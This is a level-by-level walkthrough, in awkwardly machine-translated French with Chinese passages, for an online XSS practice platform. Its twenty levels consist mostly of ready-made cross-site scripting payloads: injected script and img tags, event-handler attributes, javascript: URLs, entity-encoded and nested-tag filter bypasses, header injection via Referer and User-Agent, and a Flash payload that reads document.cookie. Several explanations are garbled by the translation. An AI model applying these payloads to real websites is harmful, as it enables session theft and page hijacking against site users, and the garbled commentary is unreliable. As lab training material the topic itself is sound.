explication
XSS une plate - forme pratique en ligne Adresse: http://test.xss.tv/
js sommaires d'utilisation XSS
XSS idées conventionnelles:
1. Allez premier point d'injection
2. trouver le point de sortie
3. Retry de sortie en continu la position de la charge utile, le format, en fonction de l'affichage
NIVEAU 1
charge utile
http://test.ctf8.com/level1.php?name=%3Cscript%3Ealert(/xss/)%3C/script%3E
http://test.ctf8.com/level1.php?name=%3Csvg/onload=alert(1)%3E
http://test.ctf8.com/level1.php?name=%3Cimg%20src=1%20onerror=alert(1)%3E
http://test.ctf8.com/level1.php?name=%%3Ca%20href=%22javascript:alert(1)%22%3Etest%3C/a%3E
NIVEAU 2
De toute évidence, les crochets ci-dessus a été filtré et les éléments suivants, mais pas
PHP dans « les variables ne seront pas exécutées
« Les variables effectuées aussi longtemps que la fermeture peut être des guillemets doubles
charge utile
http://test.ctf8.com/level2.php?keyword=%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E
http://test.ctf8.com/level4.php?keyword="onclick="window.alert()
NIVEAU 3
htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。
预定义的字符是:
& (和号)成为 &
" (双引号)成为 "
' (单引号)成为 '
< (小于)成为 <
> (大于)成为 >
charge utile
http://test.ctf8.com/level3.php?keyword=%27onclick%3D%27window.alert%28%29&submit=%E6%90%9C%E7%B4%A2
NIVEAU 4
charge utile
http://test.ctf8.com/level4.php?keyword=%22onmouseover=%22alert(1)
NIVEAU 5
Cependant, la chaîne de code sans filtre <et le caractère> caractères, alors nous pouvons utiliser des étiquettes href attribut configurés pour la charge utile pop
charge utile
http://test.ctf8.com/level5.php?keyword=%22%3E%20%3Ca%20href=%22javascript:alert(1)%22%3Exss%3C/a%3E
NIVEAU-6
charge utile
http://test.ctf8.com/level6.php?keyword=%22ONclick%3D%22window.alert%28%29&submit=%E6%90%9C%E7%B4%A2
NIVEAU-7
charge utile
http://test.ctf8.com/level7.php?keyword=%22%3E%3CScrscriptipt%3Ealert(1)%3C/Scriscriptpt%3E
NIVEAU-8
Javascript:伪协议后面可以使用URL编码。
如:<a href="javascript:%61lert(1)">click me</a>可成功执行弹窗。
可用img就不行:<img src=1 onerror="javascript:%61lert(1)">
因为href属性会跳转到其中的URL,而会进行URL解码,onerror属性只会执行JS,不跳转同时后面的url编码可以再做一次entity(HTML实体)编码:
<a href="javascript:%61lert(1)">click me</a>charge utile
http://test.ctf8.com/level8.php?keyword=javascri%26%23x0070%3Bt%3Aalert%28%29&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5
NIVEAU-9
Il suffit de le laisser détecte http, mais ne peut pas jouer un rôle, de sorte que vous pouvez utiliser le commentaire
charge utile
http://test.ctf8.com/level9.php?keyword=javascri%26%23x0070%3Bt%3Aalert%281%29%2F*http%3A%2F%2Fwww.baidu.com*%2F&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5
NIVEAU-10
charge utile
http://test.ctf8.com/level10.php?keyword%20=%20test&t_sort=%22type=%22text%22%20onclick%20=%20%22alert(1)
NIVEAU-11
charge utile
Referer: "onclick=alert(1) type="text" //所添加的Referer头部
NIVEAU 12
charge utile
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 " onclick=alert(1) type="text
NIVEAU 13
charge utile
user=call+me+maybe%3F " onclick=alert(1) type="text"
NIVEAU-14
Voir la source, cliquez sur
C'est désactivé ne peut actuellement pas faire, je regarde
NIVEAU-15
charge utile
http://127.0.0.1/xss练习小游戏/level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
NIVEAU 16
charge utile
http://127.0.0.1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F/level16.php?keyword=%3Cimg%0dsrc=1%0donerror=alert()%3E
NIVEAU 17
Filtrer les chevrons et les guillemets doubles, ce qui déclenche un événement de
charge utile
http://127.0.0.1/xss练习小游戏/level17.php?arg01=a&arg02=b%20onclick=alert(1)
NIVEAU-18
charge utile
http://127.0.0.1/xss练习小游戏/level18.php?arg01=a&arg02=%20onclick=alert(1)
NIVEAU-19
19, 20 sont analyse flash
besoins
charge utile
http://127.0.0.1/xss练习小游戏/level19.php?arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E
NIVEAU-20
Une référence spécifique FREEBUF
en effet rarement rencontré, compter le flash de quelques XSS
charge utile
http://127.0.0.1/xss练习小游戏/level20.php?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height